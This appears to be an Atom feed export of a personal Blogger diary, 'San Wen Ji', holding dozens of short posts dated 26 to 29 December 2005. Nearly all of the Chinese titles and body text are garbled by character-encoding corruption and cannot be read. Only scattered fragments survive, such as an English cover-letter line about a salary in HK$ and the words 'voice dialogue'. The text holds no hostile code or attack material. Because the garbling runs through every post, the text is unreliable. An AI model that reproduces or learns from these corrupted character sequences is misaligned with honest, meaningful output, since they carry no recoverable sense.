    - - - -San Wen Ji - -2005-12-29T19:23:00+08:00 -2005-12-29T11:25:23Z -2005-12-29T11:24:36Z - -tag:blogger.com,1999:blog-5945336.post-113585547633508691 -©ס°²°ױ¡T - -
    ₪S¦³₪­₪ׁ×÷°²´ֱ¡M©ת¦~¥|₪י₪~₪W¯Z¡C²ִ₪@¦¸¡Mֱ׳¶}₪F¦~µ²¡C§i¶D¦P¨ֶ¡M§¬O₪£·|±µֵ¥¹q¸×÷¡C
    -
    -false -
    - - - -San Wen Ji - -2005-12-29T17:21:00+08:00 -2005-12-29T09:27:16Z -2005-12-29T09:25:15Z - -tag:blogger.com,1999:blog-5945336.post-113584831539032728 -©_©ַ­±¸ױ - -
    ₪S³Q§¹Jµ©_₪H₪F¡C³o¦¸§¬₪Fְ³¼x×ּ¶ס¼g×÷¥׃½׀×ם¡M§₪w¸g©µ´©M¥L¨£­±¡C
    -
    ¦b¥L×÷¨׃«H¡M¼gµ¥L¦b¨ג¶¡₪½¥q¸ּ₪u§@¹L¡C¦b§­ּ×÷¥׃½׀×ם₪W¥L¥u¼g¥L³ּ×ס×÷₪@­׃ֲ¾¦ל¡C₪׃₪£»{¯u₪F¡S
    -
    ¥t¡M¥L§i¶D§­ּ×÷¦P¨ֶ¡M¼g¦b¥׃½׀×ם₪W×÷ֲקֲ¾­ל¦]¬O°²×÷¡C₪£¬O¶¡S°²×÷¡T¡T¡T
    -
    ¦p¦¹³o¯כ×÷₪@­׃₪H¡M­n§«ח¼ֻ¥h©M¥L¨£­±¡S
    -
    ·Q°_ voice dialogue ¾ֹ®v©ׂ»¡¡M§³oֳ‏₪H´N¬O®e©צ§ג¥H₪W÷״ֳ‏×÷₪H§l₪¹L¨׃¡C§¥i«ח¿ל¡S¦n¦n¦a­±¹ן§a¡T
    -
    «ב°O¡R§©M×B₪ֽS »¡¯÷¹D¡M§¥i¥H¼g₪@¥»ֳצ©ף­±¸ױ×ּ×÷©_»D²§¨ֶ¡M¥־·N¬Oµ¹¦b§ה₪u§@×÷₪H­ּ₪@­׃­ֳֹט¡C
    -
    -false -
    - - - -San Wen Ji - -2005-12-29T14:49:00+08:00 -2005-12-29T06:50:24Z -2005-12-29T06:50:24Z - -tag:blogger.com,1999:blog-5945336.post-113583902469639522 -¦³ֲI¶ֻ·P - -
    ₪@­׃§´L·q×÷¦P¨ֶ­nֲק¶}₪F¡M¦³ֲI¶ֻ·P¡C
    -
    ×½ִ±§i¶D§¡M¨ֳ₪£¬O¦o¦ִ@ֲק¶}×÷¡C¨׃¦~¡M¥i¯א¦³§ף¦h×÷₪Hֲק¶}¡C
    -
    ¬¬§×÷¹w¨¥·ַ½T₪£·ַ½T¡S¡T
    -
    -false -
    - - - -San Wen Ji - -2005-12-29T14:02:00+08:00 -2005-12-29T06:03:58Z -2005-12-29T06:03:58Z - -tag:blogger.com,1999:blog-5945336.post-113583623845646854 -¥ֽ©R×÷¸ׁ»¡ - -
    ¥ֽ©R×÷·N¸q¬O₪°»ע¡S¬נµM§·Q°_³o­׃©RֳD¡C
    -
    ¥ֽ©R¨S¦³₪F·N¸q¡C§·Q°¡M§A×÷¥ֽ©R·N¸q¬O₪°»ע¡S¬O¦Y³×±¼ײ¡M¬O·R±¡¡M¬O×ק¿ת¡Mֱ¬O₪°»ע¡S·ם§A»¡¥ֽ©R¨S¦³·N¸q×÷®ֹ­װ¡M§Aֱ`¥i¥H§i¶D§¥ֽ©R¬O₪°»ע¡C¹ן¶¡S¦p×G§A³s¥ֽ©R×÷·N¸q¬O₪°»ע₪]₪£×¾¹D×÷¸¡M«ח¥i¥H»¡¥ֽ©R¬O¨S¦³·N¸q×÷©O¡S
    -
    §×÷¥ֽ©R·N¸q¬O₪°»ע¡S«ֲ²³ז¡M´N¬O´M§ה¥ֽ©R×÷·N¸q¡C
    -
    -false -
    - - - -San Wen Ji - -2005-12-29T13:01:00+08:00 -2005-12-29T05:06:49Z -2005-12-29T05:06:49Z - -tag:blogger.com,1999:blog-5945336.post-113583280910518630 -¦o·Q¦÷ - -
    ¯ש©׀שj§i¶D§¦o·Q¦÷±¼¡M­ל¦]¬Oֳצ©ף¦o×÷¨א₪l¡C¸װ±¡§₪£₪׃²M·¡¡C
    -
    §¨S¦³»¡¦w¼¢×÷»¡¸¡M§­nֵ‎¦o¬²M·¡¡C§§i¶D¦o¡M¦o×÷¦÷¨ֳ₪£¥i¥H§ןֵ¨ֶ¹ך¡C¦p×G¦o×÷¨א₪l₪£¬ֳ±₪¥ֽ©R×÷¸¡M¦o×÷¦÷¬O¨S¦³ְ°§U×÷¡C§°¦o¡M¦o¦÷«ב¦o×÷₪V₪ׂ«ח»ע¼ֻ¡M₪@°_¦÷¥h¶¡S
    -
    §§i¶D¦o¡M¦o­n¦¨p₪@ֲI¡M¦o­nֳצ×`×÷¬O¦₪v×÷¥ֽ©R¡C¨א₪l×÷¥@¬ֹ₪£ֵ‎¦o¶i₪J×÷¸¡M¦o¬O¨S¦³¿ל×k¥h²z¸ׁ×÷¡C
    -
    §µ¦o·Q²M·¡¯u×÷­n¦÷¶¡T
    -
    -false -
    - - - -San Wen Ji - -2005-12-29T11:54:00+08:00 -2005-12-29T04:05:21Z -2005-12-29T03:55:33Z - -tag:blogger.com,1999:blog-5945336.post-113582853346611655 -µLµL²ב²ב×÷ - -
    µL²ב¨ֶ¥ף₪@«h¡C
    -
    ­n¼g³¡×ש×÷»·´÷¡M­n¦ׂ¨s¦r²´×÷¹B¥־¡Cֳצ§₪°»ע¨ֶ¡S
    -
    ¼g₪F¥X¨׃¡M¨S₪H¬×÷¡M₪]¨S¦³₪H¸עµ°µ¡C¬°₪°»ע­n¼g¡S
    -
    §A¾ַ¹L¡Mְ´±o¼g¡C§¨S¦³¾ַ¹L¡M«ח¥i¥H§ו§ן§A×÷¡S
    -
    ₪£¦n³o»עµL²ב¦n¶¡S
    -
    ¨ה¹ך§³ּ·Pִ±µL²ב×÷¬O¦o×÷÷A«׳¡C­n§­ּµ¹·N¨£¡Mֵ¥½}¥§Y»¡₪£¦P·N¡C¨÷»ע­n§­ּ»¡¨׃°µ₪°»ע¡S³o¨ֳ₪£¬O¶}©ס×÷·¾³q¡M¦n«³¬°¡T¦b³o¹ׂ×p₪U¡M³ּ¦n₪°»ע₪]₪£»¡¡M₪ֿ¥¿»¡₪S₪£¬O¡M₪£»¡₪S₪£¬O¡Q₪£»¡¦n₪F¡C
    -
    -false -
    - - - -San Wen Ji - -2005-12-29T11:06:00+08:00 -2005-12-29T03:50:23Z -2005-12-28T15:07:55Z - -tag:blogger.com,1999:blog-5945336.post-113578247536330700 -§N¡A₪£§N - -
    ²{¦b§×÷­I·Pִ±·ֵ·x¡M¦nµ־×A¡C
    ************************
    ¦­₪W¬®נ·ֵ¡A₪Q₪C«׳¡C¥H¬°₪£§N¡A«o§N¡C§₪¦b¨S¦³¶§¥ת×÷¿ל₪½«ַ¸ּ¡]₪׃¶§§B§B₪W¯Z×÷₪י₪l¡A§×÷­I«·x¡^¡A«§N¡C₪­®ֹ¥|₪Q₪­₪ְֲק¶}¡A₪»®ֹ₪Q₪­₪ְ₪w¸g¦^¨ל®a¡A´«₪F«O·x×÷¦ח»n¡A₪£§N₪F¡C
    -
    ₪@«׳¾ב₪₪׃¶§¦b¬P´ֱ₪ֱׁ₪£·|¥X¨׃¡A¬d¬₪ׁ®נ¹w³ר¡Aֱ¦n¡C·s×÷₪@¦~¡A₪׃¶§§B§Bֱ¥iֳi¡H
    28 Dec 05
    -
    -false -
    - - - -San Wen Ji - -2005-12-28T22:22:00+08:00 -2005-12-28T14:23:45Z -2005-12-28T14:23:45Z - -tag:blogger.com,1999:blog-5945336.post-113577982531833562 -¨C₪@¦~×÷₪u§@ - -
    ¨C¦~×÷¦~§ְ¡A§³£·|°µµ¦P¼ֻ×÷¨ֶ±¡¡C¬O₪°»ע¡H´N¬O¬°¨׃¦~×÷₪כ¾הµe₪W°O¸¹¡C¬O₪°»ע°O¸¹¡H´N¬O§­n°Oµ×÷₪י₪l¡A¦³§A­ּ×÷¡C
    -
    -false -
    - - - -San Wen Ji - -2005-12-28T21:52:00+08:00 -2005-12-28T13:54:11Z -2005-12-28T13:54:11Z - -tag:blogger.com,1999:blog-5945336.post-113577805122546220 -₪S­q₪F - -
    ¼H¼H¡I₪S­q₪F¡A¥|¥»¡C¡m«ה»פ»ױ¾׀ֲֲ¡n ¡B¡m¨H±q₪ו×÷³ּ«ב40¦~¡n¡B¡m§־¦¡»y¸q¾ַ₪½׳¡n©M¡m®ֹ¶¡×÷×´÷ְ¢w¢w¥_®qְHµ§¡n¡C
    -
    -false -
    - - - -San Wen Ji - -2005-12-28T15:16:00+08:00 -2005-12-28T09:35:50Z -2005-12-28T07:17:53Z - -tag:blogger.com,1999:blog-5945336.post-113575427341020198 -¥Xְ» - -
    §¥u¥i¥H»¡₪@¥y¡§₪ׁ₪U¯Q¾~₪@¼ֻ¶ֲ¡¨¡C§A¨÷¸ּ«¦h₪H¶¡S§°§A¬O§_¦³·s¦P¨ֶ¡M§₪w¸g»¡©ת¬O¦b¨÷₪@₪p²ױ¡M§A©~µM°§¥L×÷¦W¦r¡C¹ן₪£°_¡T§₪w¸g§ג¹q¶l§R¥h₪F¡M§A¦₪v¥־§A×÷₪ט×k§ה§ה§a¡T
    -
    ¸g²z¸g²z¡M§A«¦£¶¡S
    ********************
    ·s¨׃×÷¸g²z¡M§´N¬¬§A¿ל¨ֶ×÷¯א₪O¡C₪µ₪ׁ¿ן₪F¨ג¶µ¨ֶ±¡­n¦o§@¦^ְ³¡C§µ¥¡T
    -
    -false -
    - - - -San Wen Ji - -2005-12-28T14:48:00+08:00 -2005-12-28T06:57:01Z -2005-12-28T06:50:55Z - -tag:blogger.com,1999:blog-5945336.post-113575265501595349 -©_©ַ×÷§ - -
    §·Q°¡M¬O§_½ײ₪H§₪¦b¨÷¦ל₪l₪W¡M¦ז¬°´N·|µ¥¦P¡S§»¡×÷¬O¦ֱׁף×÷¯µ®ׁ¡C¦o¾ד­׃¦­₪W³£¦bֱ¿­zµ²±B×÷¨ֶ±¡¡C·םµMµ²±B¬O«°×¿³×÷¨ֶ¡M¦‎¬O₪]¨S¦³»­n»¡₪W¾ד­׃¦­₪W¡Q¨ה¹ך²{¦bֱ¦b»¡¡C§©ָ¡M©¹«ב×÷₪@­׃¬P´ֱ¡M¦o¯א»¡×÷´N¬O³o­׃¡C¦o»¡¸×÷÷A«׳¡M´N¹³¦b½ֽ½׳₪u§@₪@¼ֻ¡C₪p©j¡M³o¸ּ¬O₪½¥q°¡T§§₪¦b¦o¹j¾ְ¡M«·׀¹½°¡T
    -
    ¥»¨׃ֱ¦b¦ׂ¼{¥h₪£¥h¦o×÷±B®b¡M²{¦b§×÷±¡÷₪w¸g¬°§§ה¨׃₪@­׃µ×®׳¡C
    -
    -false -
    - - - -San Wen Ji - -2005-12-28T13:17:00+08:00 -2005-12-28T05:37:38Z -2005-12-28T05:23:18Z - -tag:blogger.com,1999:blog-5945336.post-113574739821812687 -¹s₪­¦~¥»blog ₪j¨ֶ¦^ֵU - -
    ¾ַµ¹qµר»O°µ×÷₪j¨ֶ¦^ֵU¡M³o¸ּ₪]¨׃¼g¼g¡C
      -
    1. «״¥°_¦₪v×÷®ֲׁN(¦¨¥₪י¬°¹s₪­¦~₪G₪כ₪­₪י)¡M¨÷¸ּ²{¦³₪@¦₪K₪Q½g₪ו³¹¡C
    2. -
    3. ¶}©l₪F²ִ₪G­׃¬G¨ֶ¡M¦W¦r¥s¡m¨S¦³¦W¦r×÷¨k₪k¥D¨₪¡n(¦‎¬O²ִ₪@­׃¬G¨ֶ¡m₪@­׃¥­₪Z×÷¬G¨ֶ¡nֱ¨S¦³§¹¦¨)¡C
    4. -
    5. ¥[₪J₪F¡m₪p»¡³s½u¡n¡M¦‎³ּ²׳°h¥X₪F¡C¨÷¬G¨ֱֶ¨S¦³¼g¨לµ²§½¡M§ֶ±ז¥L­ּ¯א°ק§ג¥¦§¹¦¨¡C
    6. -
    7. ¨¨לµL²z×÷₪H¥ֽ§נְ»(°O¾׀₪₪¦³₪T¦¸)¡M₪£©ת©ׂ¥H¡C
    8. -
    9. ִ~ִע»{ֳׁ₪F¦³²z·Q×÷×B₪ֽ¡C
    10. -
    11. ¶R₪F¼ֶ½X¬¾ק¡M¶}©l₪W¸¬₪ש¡C
    12. -
    -
    -
    -false -
    - - - -San Wen Ji - -2005-12-28T12:02:00+08:00 -2005-12-28T04:05:37Z -2005-12-28T04:05:37Z - -tag:blogger.com,1999:blog-5945336.post-113574273748422076 -­n«ה¦ׂ - -
    ­§¹F₪ׂ×÷´X¥y¸¡M´N¬O§·Q»¡×÷¡C
    -
    -
    -¥v©x₪§µ§¡A¶·¥´₪L­׃§י¦©¨׃ֵסA¥¿¥¼©צ¨¥¡F¦‎¦³¨גֲI¡A«o¥i¥H¥־§­ּ©ׂ¦ױ»D¥״¸@×÷¨ֶ¹ך¨׃§@°ֳׁׂ¡A®ֶ·Q¥¦×÷₪£µך¡C
    -
    ₪°»ע¬O¨ֶ¹ך¡M´N­n§­ּ¥h«ה¦ׂ¡C«ח¼ֻ¥h«ה¦ׂ¡M´N­n¬§O₪H©ׂ¼g×÷¡C¦n×÷₪£¦n×÷¡M¦P·N×÷₪£¦P·N×÷¡M³£­n¬¡C
    -
    -false -
    - - - -San Wen Ji - -2005-12-28T11:07:00+08:00 -2005-12-28T03:11:49Z -2005-12-28T03:11:49Z - -tag:blogger.com,1999:blog-5945336.post-113573950947514508 -¦³½ל×÷¨Dֲ¾«H - -
    ¹ן₪£°_¡T§₪£ְ³¸׃®³³o­׃¨׃¨ת¯÷§O₪H×÷¡M₪£¹L¯u×÷¦³ֲI¬₪£¹L²´¡C
    -
    -
    My current salary is HK$xx,xxx and I am confident that you will agree that I am worth more than HK$xx,xxx.
    -
    ¥‎¥ֽ¡M§·Q°¡M§A×÷«H₪¦ף¨׃©O¡S§¬₪£¨ל°¡T¦ׁ¹ך»¡¡M§ִ±±o³o¯כ×÷¨Dֲ¾«H¦³ֲI₪£×¾©ׂ¿׳¡C§A×÷­n¨D©M§­ּ×÷°_ֱ~ֲI¦³µ«₪j×÷¶Zֲק°¡T§¨S¦³«H₪§A×÷¯א₪O¨¬¥H®³¨ת§­ּ×÷ֱ~×ק¡C
    -
    -false -
    - - - -San Wen Ji - -2005-12-28T10:41:00+08:00 -2005-12-28T02:51:24Z -2005-12-28T02:44:08Z - -tag:blogger.com,1999:blog-5945336.post-113573784862201302 -­n§«ח¼ֻ¿ן§A - -
    ¦b²³¦h×÷¨Dֲ¾«H¸ּ¡M¦³₪@©~µM³sְ³¼x×÷ֲ¾¦ל₪]¼g¿ש₪F¡C­n§«ח¼ֻ¿ן§A¨׃­±¸ױ©O¡S
    -
    ₪£¬O§₪p₪²´¡M¥u¬O§Aµ¹§₪@­׃ְHְH«K«K×÷¦L¶H¡C¥i¯א§A¬O÷ֲ¾×÷¡M₪£¹L¹ן₪£°_¡M§₪£·|µ¹§A₪@­׃¾ק·|¡C
    -
    -false -
    - - - -San Wen Ji - -2005-12-28T09:33:00+08:00 -2005-12-28T03:24:42Z -2005-12-28T01:36:49Z - -tag:blogger.com,1999:blog-5945336.post-113573380925243764 -ְ´©ס₪ג¶ - -
    «©_©ַ×÷₪@­׃²{¶H¡M¬O±w₪F¥¢¯v¯g×÷¦P¨ֶ¡C¨ה¹ך₪£ְ³¸׃»¡¬O©_©ַ¡M¦p×G¥L¬O₪²z°·±d×÷¡M´N¨S¦³³o¯כ×÷×ם²{₪F¡C§­n¹ֱ¸ױ¥h₪F¸ׁ¥L¡C
    -
    ¨ֶ±¡¬O³o¼ֻ×÷¡C§­ּ₪w¸g¬°¥L¦w±ֶ₪F·s₪u§@¡M¦nֵ‎¥L§גְ£₪Oµ־½w¡M¥i¬O§«o¬¨£¥Lֱ°µµ₪@¨ַ¥L¦₪v»{¬°¬O÷c¦¨¥Lְ£₪O×÷₪u§@¡C¥L´¿¸g»¡¹L¡M¥L¥I¥X´X­׃₪כ×÷§V₪O¡M₪£₪׃·Q´N¦¹©ס±ף¡M¥i¬O¥L₪S»¡³o₪u§@¥O¥L÷כ¯«₪j¨¼vֵT¡C«¥¬°¡T
    -
    ¨ה¹ך¡M₪²z₪£°·±d¡M«¦h®ֹ­װ³£¬O₪÷¦b¥¬©ׂ§־¦¨×÷¡C¬O§­ּ₪£ִ@©ס₪U₪@¨ַ¡Mµw­n§ג©ׂ¦³×÷×F¦ט¾¬°₪v¦³¡C¦ף­W©O¡S
    -
    ₪H¥ֽ¡M¨ֳ₪£¬O²ײ¿n¡M¦׃¬O÷C÷C§ג¸g¾ת©ס₪U¡C¸ױ·Q·Q¡M¨C₪@₪ׁ¡M¨C₪@¨ט¡M§­ּ¬¨£×÷¡Mֵ¥¨£×÷¡M·P¨¨ל×÷¡M¹ך¦b₪׃¦h₪׃¦h¡C¦p×G₪£©ס₪U₪@¨ַ¡M§­ּ®¥»¨S¦³¯א₪O¥h©׃¾ב¡M³o´N¦¨¬°₪Fְ£₪O¡C¦p¦¹³o¯כ¡M§­ּ·P¨·ם₪U×÷¯א₪O₪]¨S¦³₪F¡M³o¯כ¡M₪H¥ֽ₪]¨S¦³₪F·N¸q¡M¦]¬°§­ּ¥uְ´¬¡¦b§­ּ¦»s×÷ְ£₪O₪₪¡C
    -
    -false -
    - - - -San Wen Ji - -2005-12-28T09:15:00+08:00 -2005-12-28T01:17:12Z -2005-12-28T01:17:12Z - -tag:blogger.com,1999:blog-5945336.post-113573263244583172 -¶R­I¥]×÷¹Lµ{ - -
    ­I¥]¶R₪F¡M©M×B₪ֽS ½ֽ½׳₪F¶R­I¥]×÷₪¸פ¾תµ{¡C¹ן°¡T₪¸פ¾תµ{¡C¥i¯א¬O§¸״±i₪F₪@¨ַ¡M₪£¹L±q§«ח¼ֻ¥h¶R₪@¥ף×F¦ט¡M¯u×÷¥i¥H¬¨£§₪÷A×÷§ןֵ¡C
    -
    ³o½g¡M´N¹³§©M×B₪ֽS ½ֽ½׳×÷¡C§¸ע¥L»¡¡M¶R₪F×÷­I¥]¡M¨ֳ₪£¬O₪@­׃§³ּ³ֵw×÷¡M¥u¬O¦b₪@¶¡©±חE¸ּ­±³ּ¦n×÷¡M¦₪v₪S₪£°Q¹½´N¬O₪F¡C¦p×Gµ¹§¨ל¦h₪@¨ַ×÷¦a₪ט¥h¡M¬O¥i¥Hֵ‎§¬¨ל§ף³ֵw×÷¡C¥i¬O§¨ֳ¨S¦³³o¯כ°µ¡M¦]¬°§¨S¦³¥i¯א¨«¹M©ׂ¦³×÷¦a₪ט¡C©ף¬O¡M±N½d³ע¦¬¯¶¡M¾ד­׃ֱ׫¹Lµ{´Nֵ±o§ײ±¶₪F¡C
    -
    ¦׃§¡M±o₪F₪@­׃§³ֵw×÷­I¥]¡C
    -
    -false -
    - - - -San Wen Ji - -2005-12-27T21:48:00+08:00 -2005-12-27T13:49:38Z -2005-12-27T13:49:38Z - -tag:blogger.com,1999:blog-5945336.post-113569137807483122 -¿ן¾ - -
    ¶‎¶‎©M¨k₪H¡A§A·|¿ן­‏₪@­׃¡H₪S¬O¹qµר¸`¥״×÷¼@±¡¡C
    -
    ₪£»­n¦ׂ¼{¡A·ם¨k₪H¥X½ז₪F¶‎¶‎¡A°µ₪k¨א×÷·םµM¯¸¦b¶‎¶‎¨÷ֳה¡C₪@­׃¨k₪H¡A¥i¥H¥X½ז¥פ¦ף×÷₪@­׃₪H¡A·םµM¥L₪]¥i¥H¥X½ז¨­¬°¥L₪k₪H×÷₪H¡C
    -
    §Q¦r·םְY×÷®ֹ­װ¡A«ח·|¬¨ל₪@­׃¡§±¡¡¨¦r¡H³o¼ֻ×÷₪@­׃¨k₪H¡Aֱ­ָ±o·R¶¡H
    -
    -false -
    - - - -San Wen Ji - -2005-12-27T13:50:00+08:00 -2005-12-27T06:02:52Z -2005-12-27T05:58:04Z - -tag:blogger.com,1999:blog-5945336.post-113566308472786723 -¥‏¬O§A­ּ×÷¯¬÷ײ - -
    - - - - - - - -
    - - - - - - - -
    -
    ³o­׃¥V₪י¡]ֱצµM₪£§N¡^·Pִ±«·ֵ·x°¡I
    -
    ₪H₪j₪F¡A¦¬ֲ§×«×÷ֵw³µ{«׳¨S¦³₪°»ע¯S§O₪F¡C₪ֿ¦׃¯א°ק©M₪@¸s½ֽ±o¨׃¡A·Pִ±»´ֳP×÷₪H¨א¦b₪@°_¡A₪~¬O³ּ­«­n×÷¡C
    -
    «ב°O¡G§ג×F¦ט©ס¦b₪@°_₪~µo²{¡A¥¦­ּ¥‏³¡³£¬O¶ְ¶ְ÷ס÷ס×÷¡A«¦X©ח°¡I
    -
    -false -
    - - - -San Wen Ji - -2005-12-27T13:30:00+08:00 -2005-12-27T05:32:32Z -2005-12-27T05:32:32Z - -tag:blogger.com,1999:blog-5945336.post-113566155280958956 -¹w´ֱ×÷ - -
    §¨S¦³¬¥‏₪ו¡A¦]¬°₪£·Q¬₪F¡C¦X«ק¡A₪@©w¥O­₪u¦³¨ה₪£¦w×÷¡C·םµM¦³¨ַ­₪u¥i¥H±q₪₪±o¨ל₪@ֲI§Q¯q¡]¦₪v₪]±o¨ל¹L¡^¡A₪£¹L¦X«ק₪@°_¡A¬O¦³ֲI¨S§¹¨S₪F×÷¡A¨÷÷״₪£©ת®װ©ׂ»s³y×÷ְ£₪O¡A¥O₪H₪£¦w¡C
    -
    ¦₪v×÷±oµ¡A¬O¥O¦₪v¦³¾ק·|¬¬¥@¬ֹ×÷¥t₪@­±¡A¦]¬°¦b¦X«ק¼י₪₪¡A§V₪O¨ֳ₪£₪@©w¦³¦¨×G¡A©ף¬O±N÷כ₪O©ס¦b₪@¨ַ³Q¦₪v¿ע§ׁ×÷×F¦ט₪W¡C§×÷¥ֽ¬¡¡A¹L±o«¦n°¡I
    -
    -false -
    - - - -San Wen Ji - -2005-12-27T13:20:00+08:00 -2005-12-27T05:22:11Z -2005-12-27T05:22:11Z - -tag:blogger.com,1999:blog-5945336.post-113566093177104398 -­׳¹y®ׁ¼V - - - -false - - - - -San Wen Ji - -2005-12-27T01:32:00+08:00 -2005-12-26T17:34:21Z -2005-12-26T17:34:21Z - -tag:blogger.com,1999:blog-5945336.post-113561846149942878 -ֲֲ·׃₪ש - -
    ¬°₪F¬°­I¥]¼g₪@¬qֳh©ְ¥¦×÷₪ו¦r¡A®³¥X₪F¬ֳ¯¡A¬¨ל₪F₪@¨ֲֲַ·׃₪ש¡C¬×÷®ֹ­װ¡A¨S¦³₪@ֲI×÷¶ֻ·P¡C¦b°¦₪v¡A¦³§_·R¹L¡H
    -
    §×¾¹D³o₪@¨ט¡A¨S¦³«כ¡C¨ה¹ך±q¨׃₪]¨S¦³«כ¹L¡A¥u¬O®ֹ¥ת×÷¿ש°t¡A¶}©l₪F₪@¬q₪£ְ³¸׃¶}©l×÷·P±¡¡C¬¨ל·׃₪ש₪₪×÷§¡A¨÷¯÷®e¬O¯u×÷¡C¨÷»ע´N¬O·R¹L₪F¡C
    -
    ִ©ף¦₪v×÷×F¦ט¡A­n­ֹ§U¥~׫¨׃½T»{¡C¬O¦₪v₪£ִ@©׃»{ֱ¬O₪°»ע¡H
    -
    -false -
    - - - -San Wen Ji - -2005-12-27T00:58:00+08:00 -2005-12-26T17:20:09Z -2005-12-26T17:00:20Z - -tag:blogger.com,1999:blog-5945336.post-113561642087455025 -²׳©ף - -
    ²׳©ף¡A­I¥]×÷¦©₪l§¹¥‏ֳa₪F¡]¨ה¹ךֳa₪F₪w¸g¦³₪@¬q®ֹ¶¡¡^¡A¥i¥H¶R₪@­׃·s×÷­I¥]¡C
    -
    ·Qµ¶R₪@­׃·s×÷₪w¸g¦³₪@¬q®ֹ¶¡¡A®ֹ±`§i¶D¦₪v§ה₪£¨ל₪@­׃³ֵw×÷¡A©ף¬O©לµ©לµ¡C³£₪£×¾¹D¬°¦ף­n¬°³o­׃§הֲַ₪f¡A²@µL²z¥ׁ×÷¡C
    -
    ¦n₪F¡A²׳©ף­n¶R₪F¡C§×¾¹D©ת₪ׁ§₪@©w¥i¥H¶R₪@­׃¦₪v³ֵw×÷¡AֱצµM§¥´÷ג¥h×÷¬O¹L©¹¦₪v¨«¹L¡A§ה₪£¨ל³ֵw×÷₪@­׃¦a₪ט¡C
    -
    «ב°O¡G§ׁ₪F¬°­I¥]¼g₪@¼g¥¦×÷¾ת¥v¡C³o­׃­I¥]¯S¦ג₪§₪@¡]°₪@×÷¯S¦ג¡^¡A´N¬O¨÷¦©₪l¡A¬O¦ּ©_¦ׁ¹«¡C¦b°ך³f₪½¥q¶R×÷¡C¶R₪F«ב¡A²ִ₪@¦¸¥־´N¬O±a¥¦¨ל¬°ך×F©₪×÷­}₪h¥§¥@¬ֹ¡C¨÷¦~¬O₪@₪E₪E₪E¦~¡C
    -
    ²ִ₪@­׃¦©₪lֳa×÷®ֹ­װ¡A¦b·s¥[©Y¾ק³ץ×÷¾ק³ץֲdֲi¡A¥¿¿ל²z¦^´ה×÷₪גִע¡C
    -
    ¦©₪lֳa₪F₪£´«₪@­׃·s×÷¡A¨ה¹ך¬O¦³­ל¦]×÷¡C¬O§×÷°O¾׀¡C
    -
    -false -
    - - - -San Wen Ji - -2005-12-27T00:11:00+08:00 -2005-12-26T16:13:17Z -2005-12-26T16:13:17Z - -tag:blogger.com,1999:blog-5945336.post-113561359791009840 -¬ְ¸«ב·P - -
    ¼g×÷¨ֳ₪£ֳצ©ף¬×÷¹q¼v¡C
    -
    ¥L­ּ°§·|§_¹ן¬ְ¸²£¥ֽ¿³½ל¡Aµ×®׳¬O¡§₪£¡¨¡C¬ְ¸®ֹ×÷§¡A¨ֳ₪£«ח¼ֻ§כ₪J¡A§·|·Q×F·Q¦ט×÷¡C¬µµe­±­¸³u¡A·Q×÷×F¦טֱ¥¼¨׃±o₪־¦³­׃¼v¹³¡A´N¨S¦³±oִ~ִע₪F¡Cµe­±¸ּ¦³×÷¬O₪׃¦h₪׃¦h×÷×F¦ט¡A¨׃₪£₪־§ג¥‏³¡¬§¹¡C
    -
    ֱ¬O¬¸¼@¦n¡A¨S¦³₪°»ע§G´÷¡A³ז¬O¬´X­׃₪H¦b÷tְ¸¡C
    -
    §¬O₪@­׃¦b¼צ¾x¸ּ·P¨ל©t¿W¡A¦bֲ²³ז₪₪´M§ה¼ײ½ל×÷₪H¡C
    -
    -false -
    - - - -San Wen Ji - -2005-12-26T17:03:00+08:00 -2005-12-26T09:30:20Z -2005-12-26T04:04:56Z - -tag:blogger.com,1999:blog-5945336.post-113556989679781174 -§¦b¬ - -
    ®ֵׁ×₪F¡A₪]­«·ֵ₪F×ס¥N¥v¡A₪@ֱ|¨ג±o¡C×¾¹D¦₪v¹ן×ס¥N¥v»{×¾×÷₪£¨¬¡A­ל¨׃¬O¨ל₪F³h¥F×÷¦a¨B¡C·|§V₪O×÷¡C
    **************************
    ¦₪v³ֵw×÷«~÷״¡A¡m¬G₪H¡D¬G¶m¡D¬G¨ֶ¡n¡C
    -
    -false -
    - - - -San Wen Ji - -2005-12-26T16:04:00+08:00 -2005-12-26T08:05:53Z -2005-12-26T08:05:53Z - -tag:blogger.com,1999:blog-5945336.post-113558435351393458 -­n¦÷₪~×¾¹D·R - -
    ¬O¹qµר¸`¥״×÷¼@±¡¡A¦]¬°ֱ{×ס₪jµ²§½¡A©ׂ¥Hֵ¥³o¼ֻ×÷¸×÷¾ק·|´N¦h₪F¡C
    -
    ·R₪@­׃₪H¡A¬°¦ף¦₪v₪£×¾¹D×÷¡H₪£´±×ײ©w¦₪v·R₪£·R¡A¬O₪°»ע×÷­ל¦]©O¡H­n¨ל¦÷®ֹ¡A¸£¸ּ·Qµ×÷₪@­׃₪H¡A´N¬O¦₪v×÷³ּ·R¡A³o₪ט×k¥i¾a¶¡H
    -
    §«H¦₪v×÷·Pִ±¡A·R»P₪£·R¡A´N¬O₪@÷״·Pִ±¡C
    -
    -false -
    - - - -San Wen Ji - -2005-12-26T15:50:00+08:00 -2005-12-26T07:52:10Z -2005-12-26T07:52:10Z - -tag:blogger.com,1999:blog-5945336.post-113558353042741796 -¥X×ש¡A¦^®a - -
    §³o­׃₪H¡A«©ָ¥X×ש¡A§«×÷¨ֳ₪£¬O»·×ש¡A³ז¬O¥X¥~´N¥O₪H°Q¹½¡C§¨ֳ₪£¬O°Q¹½₪ב¥~×÷¬¡°¡A´N¬O₪£³ֵw¨«¥X×ש₪f×÷¨÷₪@¨ט¡C
    -
    §³o­׃₪H¡A«³ֵw¦^®a×÷·Pִ±¡C¦^¨ל®a¡A´N₪°»ע²ײ¡A₪°»ע×÷±¡÷§C¸¨₪]¨S¦³₪F¡C
    -
    §³o­׃₪H¡A«¥¬¡C¨S¦³¥X×ש×÷¸¡A¨÷¨׃¦^®a¡H
    -
    -false -
    - - - -San Wen Ji - -2005-12-26T14:03:00+08:00 -2005-12-26T05:58:11Z -2004-12-26T10:04:03Z - -tag:blogger.com,1999:blog-5945336.post-110405544388474159 -¦h÷¶¢¨ֶ - -
    ¯א°ק¦b¦h÷¶¢¨ֶ©M§N÷z₪₪¨ת₪@­׃¥­¿ֵ¡A¬O₪@×ש«²`×÷¾ַ°¡C§¦b¹ֱ¸ױ₪₪¡C
    **********************
    -
    ¸`¿‎¦¡i´¶×ש¡j
